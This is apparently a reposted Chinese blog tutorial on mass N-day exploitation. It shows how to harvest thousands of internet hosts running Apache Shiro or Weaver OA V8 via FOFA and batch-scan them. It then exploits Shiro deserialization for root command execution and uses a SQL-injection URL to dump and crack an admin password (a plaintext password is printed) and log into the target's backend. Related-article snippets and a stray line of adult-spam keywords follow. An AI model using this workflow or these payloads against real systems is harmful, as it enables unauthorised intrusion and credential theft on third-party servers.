<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    批量漏洞挖掘思路小結

    VSole2023-01-10 11:12:08

    漏洞挖掘是指對應用程序中未知漏洞的探索,通過綜合應用各種技術和工具,盡可能地找出其中的潛在漏洞。一般情況下漏洞挖掘針對單一的應用系統,通過端口掃描、目錄掃描、文件掃描等方式對其安全性進行評估,而本文主要針對Nday和1day的漏洞挖掘,幫助初學者在前期能夠在公益漏洞榜單中刷積分,當然運氣好有時候也能挖掘到大型企業的漏洞,可以提交至專門的src機構獲取現金獎勵。

    0x01 整體思路

    整體思路主要如下所示,下面通過Shiro反序列化漏洞和泛微OA V8的SQL注入漏洞進行演示。

    1、尋找Nday或1day漏洞

    2、尋找漏洞所在應用程序特征

    3、通過fofaApi導出對應的IP地址

    4、通過批量檢測工具對導出的IP地址進行篩選

    5、驗證漏洞并進行漏洞利用

    6.、編寫漏洞報告并上交src

    0x02 漏洞挖掘

    Shiro反序列化漏洞

    Shiro框架通過記住我的功能,在用戶登陸成功后會生成經過加密并編碼的cookie。cookie的key為RememberMe,并對相關信息進行序列化,先使用aes加密,然后再使用base64編碼處理形成的。在網上關于Shiro反序列化的介紹很多,我這里就只簡單介紹一下,詳情各位可以看下大神們對其源碼的分析。

    (一)通過fofa尋找特征

    app="Apache-Shiro"
    header="rememberme=deleteMe"
    header="shiroCookie"

    (二)通過fofaApi導出相應的IP地址

    項目地址:https://github.com/k-fire/fofa-tool

    因為我開了fofa會員,可以直接在fofa.ini中配置郵箱地址和api,然后在下載的腳本目錄下執行語句

    python3 fofa-api.py
    
    規則:
    {'rule':'app="Apache-Shiro" && header="rememberme=deleteMe"','page':'','size':'10000','fields':'host','is_full':''}
    

    (三)通過批量檢測工具對導出的IP地址進行篩選

    項目地址1:https://github.com/arno567/ShiroScanF

    項目地址2:https://github.com/sv3nbeast/ShiroScan

    1、下載這兩個項目,主要使用ShiroScanF來進行批量檢測

    2、從ShiroScan中下載ysoserial.jar放在其目錄下

    3、訪問http://ceye.io/profile,獲取dnslog地址(如果沒注冊則需要注冊)

    4、修改shiroFscan.py第124行的dnslog地址

    5、將fofaapi導出的out.txt中的地址放入目錄url.txt中

    6、在ShiroScanF目錄下執行腳本

    python3 shiroFscan.py
    

    7、查看dnslog返回的信息

    8、利用反序列化攻擊進行攻擊

    項目地址1:https://github.com/j1anFen/shiro_attack/releases/tag/2.2

    項目地址2:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51

    1)shiro_attack:

    其中密鑰 kPH+bIxk5D2deZiIxcaaaA== 在shiro_attack中不存在,而是kPH+bIxk5D2deZiIxcacaA==,雖然顯示該秘鑰不可用,但是檢查當前利用鏈還是可用的

    成功執行命令whoami,執行為root權限

    2)ShiroExploit


    泛微OA V8 SQL注入漏洞

    在泛微OA V8中的getdata.jsp文件里,通過gatData方法將數據獲取并回顯在頁面上,而在getData方法中,判斷請求里cmd參數是否為空,如果不為空,調用proc方法。其中它存在四個參數,分別為空字符串、cmd參數值、request對象以及serverContext對象,通過對cmd參數值進行判斷,當cmd值等于getSelectAllId時,再從請求中獲取sql和type兩個參數值,并將參數傳遞進getSelectAllIds(sql,type)方法中,從而在前臺構造POC語句:

    http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
    

    (一)通過fofa尋找特征

    app="泛微-協同辦公OA"

    (二)通過fofaApi導出相應的IP地址

    項目地址:https://github.com/k-fire/fofa-tool

    在下載的腳本目錄下執行語句

    python3 fofa-api.py
    
    規則:
    {'rule':'app="泛微-協同辦公OA"','page':'','size':'10000','fields':'host','is_full':''}
    

    (三)通過批量檢測工具對導出的IP地址進行篩選

    項目地址:https://github.com/Yang0615777/PocList

    1、進入下載項目下,執行以下命令,將fofaAPI導出地址放入即可進行檢測

    java -jar FanWeiOA-V8-SQLinjection.jar
    

    2、訪問其中存在漏洞的網站:http://x.x.x.x/login/Login.jsp?logintype=1,其中該特征屬于泛微OA v8系統

    3、通過SQL注入POC獲取管理員密碼:http://x.x.x.x/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

    4、md5解密,得到密碼為 ASD$%^123

    5、登錄目標后臺

    0x03 總結

    本文主要介紹批量挖掘漏洞中的小技巧,希望能幫助到剛入門的小白,如果各位大佬還有其他批量挖掘思路,歡迎在評論區留言探討。

    本文作者:特mac0x01, 轉載來自FreeBuf.COM

    漏洞漏洞挖掘
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    src漏洞挖掘淺談
    2023-02-20 11:22:13
    信息收集就說到這里,信息收集的主要目的就是擴大可利用面,10000萬個資產你可能碰到弱口令,但1個資產你肯定沒有弱口令挖掘前篇前邊已經講了信息收集,在測試前為了能高效的挖掘src,就需要有數據進行測試,這個數據就是我們常說的字典,字典怎么來,整理,收集,經驗,積累。金額,數量都是可以篡改的地方小結挖掘src漏洞最主要還是挖掘邏輯漏洞,無非就是耐心,細節,多留意數據包的可疑數據,數據包所實現的功能。
    首先要上分那么一定是批量刷漏洞,不然不可能上得了分的,然后呢,既然要批量刷漏洞。兩種思路:1.審計通用性漏洞2.用大佬已公布的漏洞思路1難度較大,耗時也較長。思路2難度適中,就是需要寫腳本或者使用別人已經寫好的腳本。這是泛微繼與微信企業號合作后,又一個社交化管理平臺的落地成果。簡單的說,一般比較大的企業都會用這個平臺來做一些釘釘或者微信接口對接泛微OA的功能。
    關于漏洞的基礎知識
    2022-07-20 09:44:23
    黑客可以通過修改事件完成的順序來改變應用的行為。所以,進行有效的驗證是安全處理文件的重要保證。這種類型的漏洞有可能是編程人員在編寫程序時,因為程序的邏輯設計不合理或者錯誤而造成的程序邏輯漏洞。這種類型的漏洞最典型的是緩沖區溢出漏洞,它也是被黑客利用得最多的一種類型的漏洞
    網絡安全漏洞(以下簡稱“漏洞”)作為信息通信網絡中在硬件、軟件、協議的具體實現或系統安全策略上存在的缺陷,隨著經濟社會信息化、網絡化、數字化和智能化程度的加深,對國家網絡安全的影響也日益加劇。世界各主要國家和組織為了切實提升國家網絡安全防護能力,圍繞漏洞的研究、收集和利用,紛紛建立國家級漏洞通報平臺或漏洞數據庫。日本于2003年開始建設“日本漏洞通報”(JVN)平臺;美國于 2005 年開始建設“
    細說從0開始挖掘cms-
    2022-08-17 16:26:57
    確立目標挖洞的第一步首先是確立一個目標,也就是找個cms來挖,這里可以通過github,gitee或者谷歌百度直接去搜cms。或者cnvd查看相應的信息,通過查看相應的信息可以提高我們挖洞的效率,我們從中可以知道該項目已經存在漏洞,我們到時候挖就可以看看相應的地方會不會還存在漏洞或者避免挖到別人挖過的漏洞。本次挖掘漏洞是ofcms,首先先下載一下源碼,然后解壓丟一邊,回到網頁來看一下項目文檔。
    最后對響應的匹配,使用正則識別id命令之后的結果。成功掃描出CVE-2022-1388F5 BIG-IP API Unauthenticated RCE漏洞漏洞的請求也變異無誤,最后的響應中也是執行了id命令。案例二:利用Scalpel工具挖掘多個0day漏洞Scalpel工具使用較為靈活,通過對檢測目標變異響應的check,可以發現檢測目標中未知的安全問題。同時發現某Apache開源項目的CVE漏洞,報告被該團隊接受并正在修復,尚未披露。
    攻擊者可在無需認證的情況下,通過構造特殊的請求,觸發反序列化,從而執行任意代碼,接管運行ForgeRock AM的服務器。本文從漏洞挖掘的角度分析其中的技術細節,也將公開一些其他的反序列化點。
    對于公益SRC來說,想要沖榜就不能在一個站上浪費大量時間,公益SRC對洞的質量要求不高,所以只要 花時間,還是可以上榜的。在對某站點進行測試SQL注入的時候,先通過一些方式測試是否可能存在漏洞,然后可以直接sqlmap一把梭,也可以手工測試,然后提交漏洞。任意注冊算是低危漏洞,不過也有兩分。不管是進行SRC漏洞挖掘,還是做項目進行滲透測試,又或者是打紅藍對抗,一定要做好信息收集。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类